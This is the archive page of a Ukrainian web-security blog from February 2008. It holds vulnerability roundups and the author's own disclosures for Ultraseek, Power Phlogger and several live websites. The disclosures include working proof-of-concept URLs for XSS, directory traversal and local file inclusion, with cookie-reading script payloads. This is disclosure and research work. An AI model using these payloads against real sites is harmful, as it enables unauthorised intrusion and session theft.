Архів для категорії 'Уразливості'

Добірка уразливостей

16:38 13.02.2008

В даній добірці уразливості в веб додатках:

  • CedStat v1.31 XSS (деталі)
  • Information leak in Pearson Education PowerSchool 4.3.6 (деталі)
  • Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability (деталі)
  • Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability (деталі)
  • FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability (деталі)
  • Phpwebgallery-1.4.1, Multiple Cross Site Scripting (деталі)
  • Photostand_1.2.0 Multiple Cross Site Scripting (деталі)
  • BolinTech DreamFTP (USER) Remote Buffer Overflow PoC (деталі)
  • Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC (деталі)
  • CSRF-атака в MKPortal (деталі)
  • Міжсайтовий скриптінг в SugarCRM Sugar Open Source (деталі)
  • PHP-інклюдинг в Valdersoft Shopping Cart (деталі)
  • Vulnerability in Ezboxx Portal System (деталі)
  • PHP remote file inclusion vulnerability in Naig (деталі)
  • Дві уразливості в Soumu Workflow (деталі)

Численні уразливості в Ultraseek

23:56 12.02.2008

Як я нещодавно писав, 12.11.2006, я знайшов ряд уразливостей на websense.com (де раніше використовувався движок Ultraseek). І як я сьогодні перевірив на сайті виробника Verity Ultraseek, дані уразливості мають місце в движку Ultraseek.

Я підтвердив наявність раніше знайдених Cross-Site Scripting, Directory Traversal та Local File Inclusion уразливостей (окрім Full path disclosure) в Ultraseek, а також знайшов чимало нових уразливостей. Про що найближчим часом повідомлю розробникам даного локального пошуковця.

XSS: Remote HTML Include / Remote XSS Include:

http://site/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtest

Directory Traversal:

http://site/help/syntax.html?la=/../../index

http://site/help/searchtips.html?la=/../../index

http://site/help/refine.html?la=/../../index

http://site/help/special.html?la=/../../index

http://site/help/boolean.html?la=/../../index

http://site/help/meta.html?la=/../../index

Local File Inclusion:

http://site/help/syntax.html?la=/../query

http://site/help/searchtips.html?la=/../query

http://site/help/refine.html?la=/../query

http://site/help/special.html?la=/../query

http://site/help/boolean.html?la=/../query

http://site/help/meta.html?la=/../query

Уразливість на www.infosecuritymoscow.com

20:15 12.02.2008

06.09.2007

У березні, 27.03.2007, я знайшов Cross-Site Scripting уразливість на http://www.infosecuritymoscow.com - сайті виставки INFOSECURITY MOSCOW. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.02.2008

XSS:

Дана уразливість досі не виправлена.

Добірка уразливостей

16:33 11.02.2008

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection (деталі)
  • SQL Injection Vulnerability in Beehive Forum Software (деталі)
  • Cross-site scripting (XSS) vulnerability in Citrix NetScaler 8.0 (деталі)
  • Citrix NetScaler Web Management Cookie Weakness (деталі)
  • Meganoide’s news v1.1.1 < = RFi Vulnerabilities (деталі)
  • Dem_trac acces to log file wihtout authentification (деталі)
  • Turuncu Portal v1.0 == SQL Injection Vulnerability (деталі)
  • PHP-інклюдинг в Newxooper PHP (деталі)
  • TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit (деталі)
  • Міжсайтовий скриптінг в opentaps (деталі)
  • oftpd: Denial of Service (деталі)
  • Виконання довільних команд в TYPO3 (деталі)
  • JV2 Folder Gallery 3.0 (download.php) Remote File Disclosure Exploit (деталі)
  • Розкриття даних в Mono (деталі)
  • Cross-site scripting (XSS) vulnerability in Fastilo 2.0 and Open Solution Quick.Cart 2.0 (деталі)

Уразливості в Power Phlogger

23:52 10.02.2008

Ще 18.08.2006 я виявив Cross-Site Scripting уразливості в Power Phlogger, котрий використовує одна українська компанія як основу для власного рахівника. Про що їм у вересні 2006 повідомив і вони виправили уразливості. Хоча і дуже нечемно забули подякувати мені за мою роботу по підвищенню безпеки їх сайтів - не подякували за жоден з моїх листів про численні уразливості на їхніх сайтах (як на сайті з Power Phlogger, так й інших).

XSS:

POST запит на сторінці http://site/dspLogs.php:

"><script>alert(document.cookie)</script>В полях: Host, Referrer, Agent Information, res, colo, online, mp.

Як я перевірив учора, 09.02.2008, дані уразливості були виправлені лише частково - лише в POST запиті, а в GET XSS залишилися. Також окрім Cross-Site Scripting, я виявив Information disclosure уразливості в Power Phlogger. Про що найближчим часом сповіщу розробників веб додатку.

XSS:

http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information disclosure:

На сторінці http://site/index.php (як й інших сторінках додатку) виводиться важлива інформація про систему (версії PHP та MySQL, як і версія веб сервера з його банера) в мета-тегах. Що приводить до витоку важливої інформації.

<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це перша частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Уразливість на infostream.ua

19:24 10.02.2008

04.09.2007

У березні, 23.03.2007, я знайшов Cross-Site Scripting уразливість на проекті http://infostream.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

10.02.2008

XSS:

Дана уразливість вже виправлена.

Уразливості на images.search.yahoo.com

23:58 09.02.2008

У липні, 08.07.2007, я знайшов Cross-Site Scripting та Content Spoofing уразливості в пошуковій системі Yahoo, в пошуці по зображенням http://images.search.yahoo.com. Про що найближчим часом сповіщу адміністрацію системи.

XSS (Remote XSS/HTML Include):

Remote XSS Include та Remote HTML Include - це різновид XSS уразливостей, про який я розповідав раніше.

Content Spoofing:

Дані уразливості подібні до уразливостей в пошуці Гугла по зображенням, про які я писав в записі MOSEB-15: Vulnerabilities at images.google.com.

Добірка уразливостей

16:11 09.02.2008

В даній добірці уразливості в веб додатках:

  • Vulnerability in Peanut Knowledge Base (PeanutKB) (деталі)
  • Firebird: Buffer overflow (деталі)
  • Citrix Access Gateway session ID disclosure issue (деталі)
  • Blind Sql-Injection in Joomla 1.5 RC3 (деталі)
  • Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability (деталі)
  • RFI and Multiple XSS in PhpMyChat (деталі)
  • Snitz2000 SQL Injection: A user can gain admin level (деталі)
  • PHP remote file inclusion vulnerability in CS-Cart 1.3.3 (деталі)
  • Cross-site scripting vulnerability in Movable Type (MT) 3.33 (деталі)
  • Міжсайтовий скриптінг в Mini Web Shop (деталі)
  • Уразливість при обробці сесій в CA Portal Technology (деталі)
  • PHP remote file inclusion vulnerability in Jshop Server 1.3 (деталі)
  • Security Vulnerability in Processing GIF Images in the Java Runtime Environment May Allow an Untrusted Applet to Elevate Privileges (деталі)
  • KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit (деталі)
  • Розкриття паролів в Ozeki HTTP-SMS Gateway (деталі)

Уразливість в WordPress MU

23:52 08.02.2008

В WordPress MU версії до 1.3.2 включно виявлена уразливість, що дозволяє виконати PHP код. До якої був написаний експлоіт.

  • Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit (деталі)

Дана уразливість пов’язана з опцією active_plugins. Експоїт перезаписує опцію active_plugins движка і використовує її для виконання довільного PHP коду.

Уразливість на www.radiomayak.ru

20:15 08.02.2008

09.09.2007

У березні, 01.03.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.radiomayak.ru (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.02.2008

XSS:

Дана уразливість досі не виправлена.